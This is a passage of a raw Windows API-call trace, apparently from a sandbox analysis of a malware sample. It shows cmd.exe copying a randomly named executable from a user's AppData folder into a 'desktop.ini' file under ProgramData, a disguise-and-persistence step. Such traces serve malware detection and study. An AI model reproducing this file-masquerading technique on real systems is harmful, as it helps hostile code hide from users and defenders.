GetLastError () returned 0x2 [0151.192] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x413624, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x413624) returned 0xffffffff [0151.192] GetLastError () returned 0x2 [0151.192] _get_osfhandle (_FileHandle=2) returned 0xb [0151.192] GetFileType (hFile=0xb) returned 0x2 [0151.192] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0151.193] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x30f080 | out: lpMode=0x30f080) returned 1 [0151.193] _get_osfhandle (_FileHandle=2) returned 0xb [0151.193] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x30f0b4 | out: lpConsoleScreenBufferInfo=0x30f0b4) returned 1 [0151.193] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0151.194] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.194] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.194] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.194] GetFileType (hFile=0x7) returned 0x2 [0151.194] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0151.194] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f7a4 | out: lpMode=0x30f7a4) returned 1 [0151.194] _dup (_FileHandle=1) returned 3 [0151.194] _close (_FileHandle=1) returned 0 [0151.195] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini", _String2="con") returned -53 [0151.195] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x30f774, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0151.270] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0151.270] GetConsoleTitleW (in: lpConsoleTitle=0x30f5a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0151.271] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x30f108, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f108) returned 0x40e628 [0151.271] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0151.271] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0151.271] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0151.271] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x30e014, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0151.271] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0151.271] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.271] GetFileType (hFile=0x58) returned 0x1 [0151.271] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.271] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x30e06c | out: lpFileSizeHigh=0x30e06c*=0x0) returned 0x7d600 [0151.271] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.271] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.272] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.272] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.272] GetFileType (hFile=0x50) returned 0x1 [0151.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.272] GetFileType (hFile=0x50) returned 0x1 [0151.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.272] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.273] GetFileType (hFile=0x50) returned 0x1 [0151.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.273] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.273] GetFileType (hFile=0x50) returned 0x1 [0151.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.273] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.274] GetFileType (hFile=0x50) returned 0x1 [0151.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.274] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.274] GetFileType (hFile=0x50) returned 0x1 [0151.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.274] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.274] GetFileType (hFile=0x50) returned 0x1 [0151.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.274] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.274] GetFileType (hFile=0x50) returned 0x1 [0151.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.274] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.274] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.274] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.274] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.274] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] GetFileType (hFile=0x50) returned 0x1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] GetFileType (hFile=0x50) returned 0x1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] GetFileType (hFile=0x50) returned 0x1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] GetFileType (hFile=0x50) returned 0x1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] GetFileType (hFile=0x50) returned 0x1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.275] GetFileType (hFile=0x50) returned 0x1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] GetFileType (hFile=0x50) returned 0x1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] GetFileType (hFile=0x50) returned 0x1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.276] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.276] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.276] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.276] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] GetFileType (hFile=0x50) returned 0x1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] GetFileType (hFile=0x50) returned 0x1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.276] GetFileType (hFile=0x50) returned 0x1 [0151.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] GetFileType (hFile=0x50) returned 0x1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] GetFileType (hFile=0x50) returned 0x1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] GetFileType (hFile=0x50) returned 0x1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] GetFileType (hFile=0x50) returned 0x1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] GetFileType (hFile=0x50) returned 0x1 [0151.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.277] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.277] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.278] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.278] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.278] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] GetFileType (hFile=0x50) returned 0x1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] GetFileType (hFile=0x50) returned 0x1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] GetFileType (hFile=0x50) returned 0x1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] GetFileType (hFile=0x50) returned 0x1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] GetFileType (hFile=0x50) returned 0x1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.278] GetFileType (hFile=0x50) returned 0x1 [0151.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] GetFileType (hFile=0x50) returned 0x1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] GetFileType (hFile=0x50) returned 0x1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.279] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.279] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.279] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.279] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] GetFileType (hFile=0x50) returned 0x1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] GetFileType (hFile=0x50) returned 0x1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] GetFileType (hFile=0x50) returned 0x1 [0151.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.279] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] GetFileType (hFile=0x50) returned 0x1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] GetFileType (hFile=0x50) returned 0x1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] GetFileType (hFile=0x50) returned 0x1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] GetFileType (hFile=0x50) returned 0x1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] GetFileType (hFile=0x50) returned 0x1 [0151.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.280] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.280] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.280] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.281] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.281] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] GetFileType (hFile=0x50) returned 0x1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] GetFileType (hFile=0x50) returned 0x1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] GetFileType (hFile=0x50) returned 0x1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] GetFileType (hFile=0x50) returned 0x1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] GetFileType (hFile=0x50) returned 0x1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] GetFileType (hFile=0x50) returned 0x1 [0151.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.281] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] GetFileType (hFile=0x50) returned 0x1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] GetFileType (hFile=0x50) returned 0x1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.282] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.282] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.282] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.282] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] GetFileType (hFile=0x50) returned 0x1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] GetFileType (hFile=0x50) returned 0x1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] GetFileType (hFile=0x50) returned 0x1 [0151.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.282] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] GetFileType (hFile=0x50) returned 0x1 [0151.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.283] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, 